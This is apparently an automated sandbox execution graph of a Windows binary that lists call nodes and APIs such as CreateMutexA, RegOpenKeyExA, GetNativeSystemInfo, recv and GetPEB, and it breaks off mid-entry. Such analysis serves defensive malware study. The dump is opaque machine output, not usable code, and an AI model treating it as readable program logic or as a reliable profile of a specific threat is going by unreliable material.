                                                                                                                                                                    Signature Coverage:3.7%
                                                                                                                                                                    Total number of Nodes:764
                                                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                                                    execution_graph 12421 fb9ab8 12423 fb9acc 12421->12423 12424 fb9b08 12423->12424 12425 fba917 12424->12425 12427 fb9b4b shared_ptr 12424->12427 12426 fba953 Sleep CreateMutexA 12425->12426 12430 fba98e 12426->12430 12428 fb5c10 6 API calls 12427->12428 12429 fb9b59 12427->12429 12431 fb9b7c 12428->12431 12432 fb8b30 6 API calls 12431->12432 12433 fb9b8d 12432->12433 12434 fb5c10 6 API calls 12433->12434 12435 fb9cb1 12434->12435 12436 fb8b30 6 API calls 12435->12436 12437 fb9cc2 12436->12437 11855 fb87b2 11856 fb87b8 GetFileAttributesA 11855->11856 11857 fb87b6 11855->11857 11858 fb87c4 11856->11858 11857->11856 12321 fb2170 12324 fcc6fc 12321->12324 12323 fb217a 12325 fcc70c 12324->12325 12326 fcc724 12324->12326 12325->12326 12328 fccfbe 12325->12328 12326->12323 12329 fcccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12328->12329 12330 fccfd0 12329->12330 12330->12325 12331 fbad70 12332 fbaec0 shared_ptr __floor_pentium4 12331->12332 12334 fbaddc shared_ptr 12331->12334 12334->12332 12335 fe8ab6 12334->12335 12336 fe8ad1 12335->12336 12337 fe8868 4 API calls 12336->12337 12338 fe8adb 12337->12338 12338->12334 12347 fb8d30 12348 fb8d7f 12347->12348 12349 fb5c10 6 API calls 12348->12349 12350 fb8d9a shared_ptr __floor_pentium4 12349->12350 12438 fb42b0 12441 fb3ac0 12438->12441 12440 fb42bb shared_ptr 12442 fb3af9 12441->12442 12443 fb3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12442->12443 12444 fb32d0 6 API calls 12442->12444 12448 fb3c38 12442->12448 12443->12440 12444->12448 12445 fb32d0 6 API calls 12447 fb3c5f 12445->12447 12446 fb3c68 12446->12440 12447->12446 12449 fb3810 4 API calls 12447->12449 12448->12445 12448->12447 12450 fb3cdb 12449->12450 12593 fb77b0 12594 fb77f1 shared_ptr 12593->12594 12595 fb5c10 6 API calls 12594->12595 12597 fb7883 shared_ptr 12594->12597 12595->12597 12596 fb5c10 6 API calls 12599 fb79e3 12596->12599 12597->12596 12598 fb7953 shared_ptr __floor_pentium4 12597->12598 12600 fb5c10 6 API calls 12599->12600 12602 fb7a15 shared_ptr 12600->12602 12601 fb7aa5 shared_ptr __floor_pentium4 12602->12601 12603 fb5c10 6 API calls 12602->12603 12604 fb7b7d 12603->12604 12605 fb5c10 6 API calls 12604->12605 12606 fb7ba0 12605->12606 12607 fb5c10 6 API calls 12606->12607 12607->12601 12608 fb87b0 12609 fb87b8 GetFileAttributesA 12608->12609 12610 fb87b6 12608->12610 12611 fb87c4 12609->12611 12610->12609 12612 fc47b0 12614 fc4eed 12612->12614 12613 fc4f59 shared_ptr __floor_pentium4 12614->12613 12615 fb7d30 7 API calls 12614->12615 12616 fc50ed 12615->12616 12651 fb8380 12616->12651 12618 fc5106 12619 fb5c10 6 API calls 12618->12619 12620 fc5155 12619->12620 12621 fb5c10 6 API calls 12620->12621 12622 fc5171 12621->12622 12657 fb9a00 12622->12657 12652 fb83e5 __cftof 12651->12652 12653 fb5c10 6 API calls 12652->12653 12656 fb8403 shared_ptr __floor_pentium4 12652->12656 12654 fb8427 12653->12654 12655 fb5c10 6 API calls 12654->12655 12655->12656 12656->12618 12658 fb9a3f 12657->12658 12659 fb5c10 6 API calls 12658->12659 12660 fb9a47 12659->12660 12661 fb8b30 6 API calls 12660->12661 12662 fb9a58 12661->12662 12460 fb4276 12461 fb2410 5 API calls 12460->12461 12462 fb427f 12461->12462 12293 fba9f4 12302 fb9230 12293->12302 12295 fbaa03 shared_ptr 12296 fb5c10 6 API calls 12295->12296 12301 fbaab3 shared_ptr __floor_pentium4 12295->12301 12297 fbaa65 12296->12297 12298 fb5c10 6 API calls 12297->12298 12299 fbaa8d 12298->12299 12300 fb5c10 6 API calls 12299->12300 12300->12301 12305 fb9284 shared_ptr 12302->12305 12303 fb5c10 6 API calls 12303->12305 12304 fb9543 shared_ptr __floor_pentium4 12304->12295 12305->12303 12306 fb944f shared_ptr 12305->12306 12306->12304 12307 fb5c10 6 API calls 12306->12307 12309 fb979f shared_ptr 12306->12309 12307->12306 12308 fb98b5 shared_ptr __floor_pentium4 12308->12295 12309->12308 12310 fb5c10 6 API calls 12309->12310 12311 fb9927 shared_ptr __floor_pentium4 12310->12311 12311->12295 11839 fe6629 11842 fe64c7 11839->11842 11843 fe64d5 __fassign 11842->11843 11844 fe6520 11843->11844 11847 fe652b 11843->11847 11846 fe652a 11853 fea302 GetPEB 11847->11853 11849 fe6535 11850 fe654a __fassign 11849->11850 11851 fe653a GetPEB 11849->11851 11852 fe6562 ExitProcess 11850->11852 11851->11850 11854 fea31c __fassign 11853->11854 11854->11849 11859 fbb1a0 11860 fbb1f2 11859->11860 11861 fbb3ad CoInitialize 11860->11861 11862 fbb3fa shared_ptr __floor_pentium4 11861->11862 12179 fb20a0 12180 fcc68b __Mtx_init_in_situ 2 API calls 12179->12180 12181 fb20ac 12180->12181 12354 fb4120 12355 fb416a 12354->12355 12357 fb41b2 __floor_pentium4 12355->12357 12358 fb3ee0 12355->12358 12359 fb3f48 12358->12359 12360 fb3f1e 12358->12360 12361 fb3f58 12359->12361 12364 fb2c00 12359->12364 12360->12357 12361->12357 12365 fb2c0e 12364->12365 12371 fcb847 12365->12371 12367 fb2c42 12368 fb2c49 12367->12368 12377 fb2c80 12367->12377 12368->12357 12370 fb2c58 std::_Throw_future_error 12372 fcb854 12371->12372 12376 fcb873 Concurrency::details::_Reschedule_chore 12371->12376 12380 fccb77 12372->12380 12374 fcb864 12374->12376 12382 fcb81e 12374->12382 12376->12367 12388 fcb7fb 12377->12388 12379 fb2cb2 shared_ptr 12379->12370 12381 fccb92 CreateThreadpoolWork 12380->12381 12381->12374 12383 fcb827 Concurrency::details::_Reschedule_chore 12382->12383 12386 fccdcc 12383->12386 12385 fcb841 12385->12376 12387 fccde1 TpPostWork 12386->12387 12387->12385 12389 fcb817 12388->12389 12390 fcb807 12388->12390 12389->12379 12390->12389 12392 fcca78 12390->12392 12393 fcca8d TpReleaseWork 12392->12393 12393->12389 12475 fb3fe0 12476 fb4022 12475->12476 12477 fb408c 12476->12477 12478 fb40d2 12476->12478 12481 fb4035 __floor_pentium4 12476->12481 12482 fb35e0 12477->12482 12479 fb3ee0 3 API calls 12478->12479 12479->12481 12483 fb3616 12482->12483 12487 fb364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 12483->12487 12488 fb2ce0 12483->12488 12485 fb369e 12486 fb2c00 3 API calls 12485->12486 12485->12487 12486->12487 12487->12481 12489 fb2d1d 12488->12489 12490 fcbedf InitOnceExecuteOnce 12489->12490 12491 fb2d46 12490->12491 12492 fb2d88 12491->12492 12493 fb2d51 __floor_pentium4 12491->12493 12497 fcbef7 12491->12497 12495 fb2440 4 API calls 12492->12495 12493->12485 12496 fb2d9b 12495->12496 12496->12485 12498 fcbf03 std::_Throw_future_error 12497->12498 12499 fcbf6a 12498->12499 12500 fcbf73 12498->12500 12504 fcbe7f 12499->12504 12502 fb2ae0 5 API calls 12500->12502 12503 fcbf6f 12502->12503 12503->12492 12505 fccc31 InitOnceExecuteOnce 12504->12505 12506 fcbe97 12505->12506 12507 fcbe9e 12506->12507 12508 fe6cbb 4 API calls 12506->12508 12507->12503 12509 fcbea7 12508->12509 12509->12503 12687 fbaf20 12688 fbaf63 12687->12688 12699 fe6660 12688->12699 12693 fe663f 4 API calls 12694 fbaf80 12693->12694 12695 fe663f 4 API calls 12694->12695 12696 fbaf98 __cftof 12695->12696 12705 fb55f0 12696->12705 12698 fbb04e shared_ptr __floor_pentium4 12700 fea671 __fassign 4 API calls 12699->12700 12701 fbaf69 12700->12701 12702 fe663f 12701->12702 12703 fea671 __fassign 4 API calls 12702->12703 12704 fbaf71 12703->12704 12704->12693 12706 fb5610 12705->12706 12708 fb5710 __floor_pentium4 12706->12708 12709 fb22c0 12706->12709 12708->12698 12712 fb2280 12709->12712 12713 fb2296 12712->12713 12716 fe87f8 12713->12716 12719 fe7609 12716->12719 12718 fb22a4 12718->12706 12720 fe7649 12719->12720 12724 fe7631 ___std_exception_copy __floor_pentium4 12719->12724 12721 fe690a __fassign 4 API calls 12720->12721 12720->12724 12722 fe7661 12721->12722 12725 fe7bc4 12722->12725 12724->12718 12727 fe7bd5 12725->12727 12726 fe7be4 ___std_exception_copy 12726->12724 12727->12726 12732 fe8168 12727->12732 12737 fe7dc2 12727->12737 12742 fe7de8 12727->12742 12752 fe7f36 12727->12752 12733 fe8171 12732->12733 12735 fe8178 12732->12735 12761 fe7b50 12733->12761 12735->12727 12736 fe8177 12736->12727 12738 fe7dcb 12737->12738 12739 fe7dd2 12737->12739 12740 fe7b50 4 API calls 12738->12740 12739->12727 12741 fe7dd1 12740->12741 12741->12727 12744 fe7def 12742->12744 12745 fe7e09 ___std_exception_copy 12742->12745 12743 fe7f69 12750 fe7f77 12743->12750 12751 fe7f8b 12743->12751 12769 fe8241 12743->12769 12744->12743 12744->12745 12747 fe7fa2 12744->12747 12744->12750 12745->12727 12747->12751 12765 fe8390 12747->12765 12750->12751 12773 fe86ea 12750->12773 12751->12727 12753 fe7f69 12752->12753 12755 fe7f4f 12752->12755 12756 fe8241 4 API calls 12753->12756 12759 fe7f77 12753->12759 12760 fe7f8b 12753->12760 12754 fe7fa2 12757 fe8390 4 API calls 12754->12757 12754->12760 12755->12753 12755->12754 12755->12759 12756->12759 12757->12759 12758 fe86ea 4 API calls 12758->12760 12759->12758 12759->12760 12760->12727 12762 fe7b62 12761->12762 12763 fe8ab6 4 API calls 12762->12763 12764 fe7b85 12763->12764 12764->12736 12766 fe83ab 12765->12766 12767 fe83dd 12766->12767 12777 fec88e 12766->12777 12767->12750 12770 fe825a 12769->12770 12784 fed3c8 12770->12784 12772 fe830d 12772->12750 12772->12772 12775 fe875d __floor_pentium4 12773->12775 12776 fe8707 12773->12776 12774 fec88e __cftof 4 API calls 12774->12776 12775->12751 12776->12774 12776->12775 12780 fec733 12777->12780 12779 fec8a6 12779->12767 12781 fec743 12780->12781 12782 fe690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12781->12782 12783 fec748 __cftof ___std_exception_copy 12781->12783 12782->12783 12783->12779 12785 fed3d8 ___std_exception_copy 12784->12785 12788 fed3ee 12784->12788 12785->12772 12786 fed485 12790 fed4ae 12786->12790 12791 fed4e4 12786->12791 12787 fed48a 12797 fecbdf 12787->12797 12788->12785 12788->12786 12788->12787 12792 fed4cc 12790->12792 12793 fed4b3 12790->12793 12814 fecef8 12791->12814 12810 fed0e2 12792->12810 12803 fed23e 12793->12803 12798 fecbf1 12797->12798 12799 fe690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12798->12799 12800 fecc05 12799->12800 12801 fecef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12800->12801 12802 fecc0d __alldvrm __cftof ___std_exception_copy _strrchr 12800->12802 12801->12802 12802->12785 12806 fed26c 12803->12806 12804 fed2a5 12804->12785 12805 fed2de 12808 fecf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12805->12808 12806->12804 12806->12805 12807 fed2b7 12806->12807 12809 fed16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12807->12809 12808->12804 12809->12804 12811 fed10f 12810->12811 12812 fed14e 12811->12812 12813 fed16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12811->12813 12812->12785 12813->12812 12815 fecf10 12814->12815 12816 fecf75 12815->12816 12817 fecf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12815->12817 12816->12785 12817->12816 12663 fb9ba5 12664 fb9ba7 12663->12664 12665 fb5c10 6 API calls 12664->12665 12666 fb9cb1 12665->12666 12667 fb8b30 6 API calls 12666->12667 12668 fb9cc2 12667->12668 12339 fb215a 12340 fcc6fc InitializeCriticalSectionEx 12339->12340 12341 fb2164 12340->12341 12669 fb3f9f 12670 fb3fad 12669->12670 12671 fb3fb6 12669->12671 12672 fb2410 5 API calls 12670->12672 12672->12671 12402 fb9adc 12403 fb9aea shared_ptr 12402->12403 12404 fba917 12403->12404 12407 fb9b4b shared_ptr 12403->12407 12405 fba953 Sleep CreateMutexA 12404->12405 12406 fba98e 12405->12406 12408 fb5c10 6 API calls 12407->12408 12409 fb9b59 12407->12409 12410 fb9b7c 12408->12410 12417 fb8b30 12410->12417 12412 fb9b8d 12413 fb5c10 6 API calls 12412->12413 12414 fb9cb1 12413->12414 12415 fb8b30 6 API calls 12414->12415 12416 fb9cc2 12415->12416 12418 fb8b7c 12417->12418 12419 fb5c10 6 API calls 12418->12419 12420 fb8b97 shared_ptr __floor_pentium4 12419->12420 12420->12412 12673 fb2b90 12674 fb2bce 12673->12674 12675 fcb7fb TpReleaseWork 12674->12675 12676 fb2bdb shared_ptr __floor_pentium4 12675->12676 12818 fb2b10 12819 fb2b1a 12818->12819 12820 fb2b1c 12818->12820 12821 fcc26a 5 API calls 12820->12821 12822 fb2b22 12821->12822 12510 fc87d0 12511 fc882a __cftof 12510->12511 12517 fc9bb0 12511->12517 12515 fc88d9 std::_Throw_future_error 12516 fc886c __floor_pentium4 12530 fc9ef0 12517->12530 12519 fc9be5 12520 fb2ce0 5 API calls 12519->12520 12521 fc9c16 12520->12521 12534 fc9f70 12521->12534 12523 fc8854 12523->12516 12524 fb43f0 12523->12524 12525 fcbedf InitOnceExecuteOnce 12524->12525 12526 fb440a 12525->12526 12527 fb4411 12526->12527 12528 fe6cbb 4 API calls 12526->12528 12527->12515 12529 fb4424 12528->12529 12531 fc9f0c 12530->12531 12532 fcc68b __Mtx_init_in_situ 2 API calls 12531->12532 12533 fc9f17 12532->12533 12533->12519 12535 fc9fef shared_ptr 12534->12535 12538 fca058 12535->12538 12539 fca210 12535->12539 12537 fca03b 12537->12523 12540 fca290 12539->12540 12546 fc71d0 12540->12546 12542 fca2cc shared_ptr 12543 fca4be shared_ptr 12542->12543 12544 fb3ee0 3 API calls 12542->12544 12543->12537 12545 fca4a6 12544->12545 12545->12537 12547 fc7211 12546->12547 12554 fb3970 12547->12554 12549 fc72ad __cftof 12550 fcc68b __Mtx_init_in_situ 2 API calls 12549->12550 12553 fc7446 __floor_pentium4 12549->12553 12551 fc7401 12550->12551 12559 fb2ec0 12551->12559 12553->12542 12555 fcc68b __Mtx_init_in_situ 2 API calls 12554->12555 12556 fb39a7 12555->12556 12557 fcc68b __Mtx_init_in_situ 2 API calls 12556->12557 12558 fb39e6 12557->12558 12558->12549 12560 fb2f06 12559->12560 12567 fb2f6f 12559->12567 12561 fcc6ac GetSystemTimePreciseAsFileTime 12560->12561 12562 fb2f12 12561->12562 12563 fb301e 12562->12563 12564 fb2f1d __Mtx_unlock 12562->12564 12565 fcc26a 5 API calls 12563->12565 12566 fb3024 12564->12566 12564->12567 12565->12566 12568 fcc26a 5 API calls 12566->12568 12569 fcc6ac GetSystemTimePreciseAsFileTime 12567->12569 12578 fb2fef 12567->12578 12570 fb2fb9 12568->12570 12569->12570 12571 fcc26a 5 API calls 12570->12571 12572 fb2fc0 __Mtx_unlock 12570->12572 12571->12572 12573 fcc26a 5 API calls 12572->12573 12574 fb2fd8 __Cnd_broadcast 12572->12574 12573->12574 12575 fcc26a 5 API calls 12574->12575 12574->12578 12576 fb303c 12575->12576 12577 fcc6ac GetSystemTimePreciseAsFileTime 12576->12577 12588 fb3080 shared_ptr __Mtx_unlock 12577->12588 12578->12553 12579 fb31c5 12580 fcc26a 5 API calls 12579->12580 12581 fb31cb 12580->12581 12582 fcc26a 5 API calls 12581->12582 12583 fb31d1 12582->12583 12584 fcc26a 5 API calls 12583->12584 12590 fb3193 __Mtx_unlock 12584->12590 12585 fb31a7 __floor_pentium4 12585->12553 12586 fcc26a 5 API calls 12587 fb31dd 12586->12587 12588->12579 12588->12581 12588->12585 12589 fcc6ac GetSystemTimePreciseAsFileTime 12588->12589 12591 fb315f 12589->12591 12590->12585 12590->12586 12591->12579 12591->12583 12591->12590 12592 fcbd4c GetSystemTimePreciseAsFileTime 12591->12592 12592->12591 11997 fba856 11998 fba870 11997->11998 12000 fba892 shared_ptr 11997->12000 11999 fba94e 11998->11999 11998->12000 12002 fba953 Sleep CreateMutexA 11999->12002 12004 fba8a0 12000->12004 12013 fb7d30 12000->12013 12006 fba98e 12002->12006 12003 fba8ae 12003->12004 12005 fb7d30 7 API calls 12003->12005 12007 fba8b8 12005->12007 12007->12004 12008 fb7d30 7 API calls 12007->12008 12009 fba8c2 12008->12009 12009->12004 12010 fb7d30 7 API calls 12009->12010 12011 fba8cc 12010->12011 12011->12004 12012 fb7d30 7 API calls 12011->12012 12012->12004 12014 fb7d96 __cftof 12013->12014 12051 fb7ee8 shared_ptr __floor_pentium4 12014->12051 12052 fb5c10 12014->12052 12016 fb7dd2 12017 fb5c10 6 API calls 12016->12017 12019 fb7dff shared_ptr 12017->12019 12018 fb7ed3 GetNativeSystemInfo 12020 fb7ed7 12018->12020 12019->12018 12019->12020 12019->12051 12021 fb8019 12020->12021 12022 fb7f3f 12020->12022 12020->12051 12024 fb5c10 6 API calls 12021->12024 12023 fb5c10 6 API calls 12022->12023 12025 fb7f67 12023->12025 12026 fb804c 12024->12026 12027 fb5c10 6 API calls 12025->12027 12028 fb5c10 6 API calls 12026->12028 12030 fb7f86 12027->12030 12029 fb806b 12028->12029 12032 fb5c10 6 API calls 12029->12032 12062 fe8bbe 12030->12062 12033 fb80a3 12032->12033 12034 fb5c10 6 API calls 12033->12034 12035 fb80f4 12034->12035 12036 fb5c10 6 API calls 12035->12036 12037 fb8113 12036->12037 12038 fb5c10 6 API calls 12037->12038 12039 fb814b 12038->12039 12040 fb5c10 6 API calls 12039->12040 12041 fb819c 12040->12041 12042 fb5c10 6 API calls 12041->12042 12043 fb81bb 12042->12043 12044 fb5c10 6 API calls 12043->12044 12045 fb81f3 12044->12045 12046 fb5c10 6 API calls 12045->12046 12047 fb8244 12046->12047 12048 fb5c10 6 API calls 12047->12048 12049 fb8263 12048->12049 12050 fb5c10 6 API calls 12049->12050 12050->12051 12051->12003 12053 fb5c54 12052->12053 12065 fb4b30 12053->12065 12055 fb5d17 shared_ptr __floor_pentium4 12055->12016 12056 fb5c7b __cftof 12056->12055 12057 fb5da7 RegOpenKeyExA 12056->12057 12058 fb5e00 RegCloseKey 12057->12058 12060 fb5e26 12058->12060 12059 fb5ea6 shared_ptr __floor_pentium4 12059->12016 12060->12059 12061 fb5c10 4 API calls 12060->12061 12093 fe8868 12062->12093 12064 fe8bdc 12064->12051 12067 fb4ce5 12065->12067 12068 fb4b92 12065->12068 12067->12056 12068->12067 12069 fe6da6 12068->12069 12070 fe6db4 12069->12070 12072 fe6dc2 __fassign 12069->12072 12074 fe6d19 12070->12074 12072->12068 12075 fe690a __fassign 4 API calls 12074->12075 12076 fe6d2c 12075->12076 12079 fe6d52 12076->12079 12078 fe6d3d 12078->12068 12080 fe6d8f 12079->12080 12083 fe6d5f 12079->12083 12081 feb67d 4 API calls 12080->12081 12082 fe6d6e __fassign 12081->12082 12082->12078 12083->12082 12085 feb6a1 12083->12085 12086 fe690a __fassign 4 API calls 12085->12086 12087 feb6be 12086->12087 12089 feb6ce __floor_pentium4 12087->12089 12090 fef1bf 12087->12090 12089->12082 12091 fe690a __fassign 4 API calls 12090->12091 12092 fef1df __cftof __fassign __freea __floor_pentium4 12091->12092 12092->12089 12094 fe887a 12093->12094 12095 fe690a __fassign 4 API calls 12094->12095 12098 fe888f ___std_exception_copy 12094->12098 12097 fe88bf 12095->12097 12096 fe6d52 4 API calls 12096->12097 12097->12096 12097->12098 12098->12064 12394 fcd111 12396 fcd122 12394->12396 12395 fcd12a 12396->12395 12398 fcd199 12396->12398 12399 fcd1a7 SleepConditionVariableCS 12398->12399 12400 fcd1c0 12398->12400 12399->12400 12400->12396 12182 fb3c8e 12183 fb3c98 12182->12183 12185 fb3ca5 12183->12185 12190 fb2410 12183->12190 12186 fb3ccf 12185->12186 12194 fb3810 12185->12194 12188 fb3810 4 API calls 12186->12188 12189 fb3cdb 12188->12189 12191 fb2424 12190->12191 12198 fcb52d 12191->12198 12195 fb381c 12194->12195 12240 fb2440 12195->12240 12206 fe3aed 12198->12206 12200 fb242a 12200->12185 12201 fcb5a5 ___std_exception_copy 12213 fcb1ad 12201->12213 12202 fcb598 12209 fcaf56 12202->12209 12217 fe4f29 12206->12217 12208 fcb555 12208->12200 12208->12201 12208->12202 12210 fcaf9f ___std_exception_copy 12209->12210 12212 fcafb2 shared_ptr 12210->12212 12223 fcb39f 12210->12223 12212->12200 12214 fcb1d8 12213->12214 12215 fcb1e1 shared_ptr 12213->12215 12216 fcb39f 5 API calls 12214->12216 12215->12200 12216->12215 12218 fe4f2e __fassign 12217->12218 12218->12208 12219 fed634 __fassign 4 API calls 12218->12219 12222 fe8bfc ___std_exception_copy 12218->12222 12219->12222 12220 fe65ed __fassign 3 API calls 12221 fe8c2f 12220->12221 12222->12220 12224 fcbedf InitOnceExecuteOnce 12223->12224 12225 fcb3e1 12224->12225 12226 fcb3e8 12225->12226 12234 fe6cbb 12225->12234 12226->12212 12235 fe6cc7 __fassign 12234->12235 12236 fea671 __fassign 4 API calls 12235->12236 12239 fe6ccc 12236->12239 12237 fe8bec __fassign 4 API calls 12238 fe6cf6 12237->12238 12239->12237 12243 fcb5d6 12240->12243 12242 fb2472 12244 fcb5f1 std::_Throw_future_error 12243->12244 12245 fe8bec __fassign 4 API calls 12244->12245 12247 fcb658 __fassign __floor_pentium4 12244->12247 12246 fcb69f 12245->12246 12247->12242 12463 fe6a44 12464 fe6a5c 12463->12464 12465 fe6a52 12463->12465 12468 fe698d 12464->12468 12467 fe6a76 ___free_lconv_mon 12469 fe690a __fassign 4 API calls 12468->12469 12470 fe699f 12469->12470 12470->12467 11863 fb8780 11864 fb8786 11863->11864 11870 fe6729 11864->11870 11867 fb87a6 11869 fb87a0 11877 fe6672 11870->11877 11872 fb8793 11872->11867 11873 fe67b7 11872->11873 11875 fe67c3 __fassign 11873->11875 11874 fe67cd ___std_exception_copy 11874->11869 11875->11874 11893 fe6740 11875->11893 11879 fe667e __fassign 11877->11879 11878 fe6685 ___std_exception_copy 11878->11872 11879->11878 11881 fea8c3 11879->11881 11882 fea8cf __fassign 11881->11882 11885 fea967 11882->11885 11884 fea8ea 11884->11878 11886 fea98a 11885->11886 11888 fea9d0 ___free_lconv_mon 11886->11888 11889 fed82f 11886->11889 11888->11884 11892 fed83c __fassign 11889->11892 11890 fed867 RtlAllocateHeap 11891 fed87a 11890->11891 11890->11892 11891->11888 11892->11890 11892->11891 11894 fe6762 11893->11894 11896 fe674d ___std_exception_copy ___free_lconv_mon 11893->11896 11894->11896 11897 fea038 11894->11897 11896->11874 11898 fea050 11897->11898 11900 fea075 11897->11900 11898->11900 11901 ff0439 11898->11901 11900->11896 11902 ff0445 __fassign 11901->11902 11904 ff044d __dosmaperr ___std_exception_copy 11902->11904 11905 ff052b 11902->11905 11904->11900 11906 ff054d 11905->11906 11910 ff0551 __dosmaperr ___std_exception_copy 11905->11910 11906->11910 11911 ff00d2 11906->11911 11910->11904 11912 ff00e3 11911->11912 11913 ff0106 11912->11913 11922 fea671 11912->11922 11913->11910 11915 fefcc0 11913->11915 11916 fefd0d 11915->11916 11955 fe690a 11916->11955 11919 fec719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 11921 fefd1c __cftof __fassign 11919->11921 11920 feffbc __floor_pentium4 11920->11910 11921->11919 11921->11920 11921->11921 11963 feb67d 11921->11963 11923 fea67b __fassign 11922->11923 11924 fea694 __fassign ___free_lconv_mon 11923->11924 11925 fed82f __fassign RtlAllocateHeap 11923->11925 11926 fea722 11924->11926 11929 fe8bec 11924->11929 11925->11924 11926->11913 11930 fe8bf1 __fassign 11929->11930 11932 fe8bfc ___std_exception_copy 11930->11932 11935 fed634 11930->11935 11949 fe65ed 11932->11949 11936 fed640 __fassign 11935->11936 11937 fed69c ___std_exception_copy 11936->11937 11938 fed81b __fassign 11936->11938 11939 fed726 11936->11939 11941 fed751 __fassign 11936->11941 11937->11932 11940 fe65ed __fassign 3 API calls 11938->11940 11939->11941 11952 fed62b 11939->11952 11942 fed82e 11940->11942 11941->11937 11944 fea671 __fassign 4 API calls 11941->11944 11947 fed7a5 11941->11947 11944->11947 11946 fed62b __fassign 4 API calls 11946->11941 11947->11937 11948 fea671 __fassign 4 API calls 11947->11948 11948->11937 11950 fe64c7 __fassign 3 API calls 11949->11950 11951 fe65fe 11950->11951 11953 fea671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11952->11953 11954 fed630 11953->11954 11954->11946 11956 fe692a 11955->11956 11962 fe6921 11955->11962 11957 fea671 __fassign 4 API calls 11956->11957 11956->11962 11958 fe694a 11957->11958 11968 feb5fb 11958->11968 11962->11921 11964 fea671 __fassign 4 API calls 11963->11964 11965 feb688 11964->11965 11966 feb5fb __fassign 4 API calls 11965->11966 11967 feb698 11966->11967 11967->11921 11969 feb60e 11968->11969 11970 fe6960 11968->11970 11969->11970 11976 fef5ab 11969->11976 11972 feb628 11970->11972 11973 feb63b 11972->11973 11974 feb650 11972->11974 11973->11974 11983 fee6b1 11973->11983 11974->11962 11977 fef5b7 __fassign 11976->11977 11978 fea671 __fassign 4 API calls 11977->11978 11980 fef5c0 __fassign 11978->11980 11979 fef606 11979->11970 11980->11979 11981 fe8bec __fassign 4 API calls 11980->11981 11982 fef62b 11981->11982 11984 fea671 __fassign 4 API calls 11983->11984 11985 fee6bb 11984->11985 11988 fee5c9 11985->11988 11987 fee6c1 11987->11974 11990 fee5d5 __fassign ___free_lconv_mon 11988->11990 11989 fee5f6 11989->11987 11990->11989 11991 fe8bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11990->11991 11992 fee668 11991->11992 11993 fee6a4 11992->11993 11994 fea72e __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11992->11994 11993->11987 11995 fee695 11994->11995 11996 fee4b0 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11995->11996 11996->11993 12103 fb20c0 12106 fcc68b 12103->12106 12105 fb20cc 12109 fcc3d5 12106->12109 12108 fcc69b 12108->12105 12110 fcc3eb 12109->12110 12111 fcc3e1 12109->12111 12110->12108 12112 fcc3be 12111->12112 12113 fcc39e 12111->12113 12122 fccd0a 12112->12122 12113->12110 12118 fcccd5 12113->12118 12115 fcc3d0 12115->12108 12119 fccce3 InitializeCriticalSectionEx 12118->12119 12121 fcc3b7 12118->12121 12119->12121 12121->12108 12123 fccd1f RtlInitializeConditionVariable 12122->12123 12123->12115 12124 fcd0c7 12125 fcd0d7 12124->12125 12126 fcd17f 12125->12126 12127 fcd17b RtlWakeAllConditionVariable 12125->12127 12128 fbe0c0 recv 12129 fbe122 recv 12128->12129 12130 fbe157 recv 12129->12130 12132 fbe191 12130->12132 12131 fbe2b3 __floor_pentium4 12132->12131 12137 fcc6ac 12132->12137 12144 fcc452 12137->12144 12139 fbe2ee 12140 fcc26a 12139->12140 12141 fcc292 12140->12141 12142 fcc274 12140->12142 12141->12141 12142->12141 12161 fcc297 12142->12161 12145 fcc4a8 12144->12145 12147 fcc47a __floor_pentium4 12144->12147 12145->12147 12150 fccf6b 12145->12150 12147->12139 12148 fcc4fd __Xtime_diff_to_millis2 12148->12147 12149 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 12148->12149 12149->12148 12151 fccf7a 12150->12151 12153 fccf87 __aulldvrm 12150->12153 12151->12153 12154 fccf44 12151->12154 12153->12148 12157 fccbea 12154->12157 12158 fccbfb GetSystemTimePreciseAsFileTime 12157->12158 12159 fccc07 12157->12159 12158->12159 12159->12153 12164 fb2ae0 12161->12164 12163 fcc2ae std::_Throw_future_error 12172 fcbedf 12164->12172 12166 fb2aff 12166->12163 12167 fb2af4 __fassign 12167->12166 12168 fea671 __fassign 4 API calls 12167->12168 12170 fe6ccc 12168->12170 12169 fe8bec __fassign 4 API calls 12171 fe6cf6 12169->12171 12170->12169 12175 fccc31 12172->12175 12176 fccc3f InitOnceExecuteOnce 12175->12176 12178 fcbef2 12175->12178 12176->12178 12178->12167 12317 fb8980 12319 fb8aea 12317->12319 12320 fb89d8 shared_ptr 12317->12320 12318 fb5c10 6 API calls 12318->12320 12320->12318 12320->12319 12471 fb2e00 12472 fb2e28 12471->12472 12473 fcc68b __Mtx_init_in_situ 2 API calls 12472->12473 12474 fb2e33 12473->12474 12253 fb3c47 12254 fb3c51 12253->12254 12257 fb3c5f 12254->12257 12260 fb32d0 12254->12260 12255 fb3c68 12257->12255 12258 fb3810 4 API calls 12257->12258 12259 fb3cdb 12258->12259 12261 fcc6ac GetSystemTimePreciseAsFileTime 12260->12261 12269 fb3314 12261->12269 12262 fb336b 12263 fcc26a 5 API calls 12262->12263 12264 fb333c __Mtx_unlock 12263->12264 12266 fcc26a 5 API calls 12264->12266 12267 fb3350 __floor_pentium4 12264->12267 12268 fb3377 12266->12268 12267->12257 12270 fcc6ac GetSystemTimePreciseAsFileTime 12268->12270 12269->12262 12269->12264 12279 fcbd4c 12269->12279 12271 fb33af 12270->12271 12272 fcc26a 5 API calls 12271->12272 12273 fb33b6 __Cnd_broadcast 12271->12273 12272->12273 12274 fcc26a 5 API calls 12273->12274 12275 fb33d7 __Mtx_unlock 12273->12275 12274->12275 12276 fcc26a 5 API calls 12275->12276 12277 fb33eb 12275->12277 12278 fb340e 12276->12278 12277->12257 12278->12257 12282 fcbb72 12279->12282 12281 fcbd5c 12281->12269 12283 